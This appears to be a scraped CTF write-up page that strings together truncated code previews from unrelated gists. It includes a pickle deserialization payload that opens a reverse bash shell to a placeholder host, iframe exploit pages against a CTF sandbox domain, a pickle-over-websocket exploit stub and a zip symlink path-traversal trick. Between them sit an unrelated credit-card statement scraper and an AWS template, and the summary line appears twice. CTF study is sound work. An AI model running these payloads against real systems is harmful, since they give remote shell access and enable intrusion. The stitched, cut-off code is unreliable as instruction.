- CTFtime: https://ctftime.org/event/2441/
You can download challenge files from: smooth-note.tar.gz
Summary
You can download challenge files from: smooth-note.tar.gz
Summary
import pickle | |
import base64 | |
import requests | |
import json | |
import os | |
class P(object): | |
def __reduce__(self): | |
return (exec,('import socket,os,pty;s=socket.socket();s.connect(("xx.xx.xx.xx",4242));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")',)) |
<body> | |
<iframe id="frame1"></iframe> | |
<iframe id="frame2"></iframe> | |
<script> | |
function arrayToBase36(arr) { | |
return arr | |
.reduce((a, b) => BigInt(256) * a + BigInt(b), BigInt(0)) | |
.toString(36); | |
} |
// Locate this file in https://storage.googleapis.com | |
const evaluatorHtml = ` | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>Evaluator</title> | |
<script> | |
onmessage = e => { |
from http.server import HTTPServer | |
from http.server import BaseHTTPRequestHandler | |
import requests | |
import sys | |
import re | |
import base64 | |
import websocket | |
import time | |
import threading | |
import json |
meisai = [...document.querySelectorAll('#meisaiTable tbody tr')] | |
.filter(tr => tr.id === '') | |
.map(tr => [...tr.querySelectorAll('td')]) | |
.map(tds => { | |
const date = tds[1].textContent | |
const content = tds[2].textContent | |
const price = tds[7].textContent.replaceAll(/\s/gi, '') | |
return `${date}\t${content}\t\tクレジットカード:ANAゴールドカード\t${price}` | |
}) | |
.join('\n') |
To solve the challenge we need to upload a symlink file in zipfile.
When we upload zipfile, it will be unzipped and then, symlink in zipfile will be deleted.
But if the entry name contains ../
, symlink will not be deteled.
Therefore we create a symlink entry foo/../bar
in zipfile.
AWSTemplateFormatVersion: 2010-09-09 | |
Description: A kick-ass cloud app for hacker movienights! | |
Parameters: | |
AppName: | |
Type: String | |
Default: api-movies | |
Description: Name of application. | |
StageName: | |
Type: String | |
Default: prod |
<body> | |
<script> | |
const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time)) | |
const frame = document.createElement('iframe'); | |
frame.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`; | |
document.body.appendChild(frame); | |
const frame2 = document.createElement('iframe'); | |
frame2.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`; | |
frame2.setAttribute('sandbox', 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols') |
from websocket import create_connection | |
from base64 import b64encode, b64decode | |
import pickle | |
ticket = 'ticket{}' | |
ws = create_connection("ws://localhost:8081/ws/", subprotocols=[ticket]) | |
PICKLE_OP_NAMES = { | |
"MARK": '(', |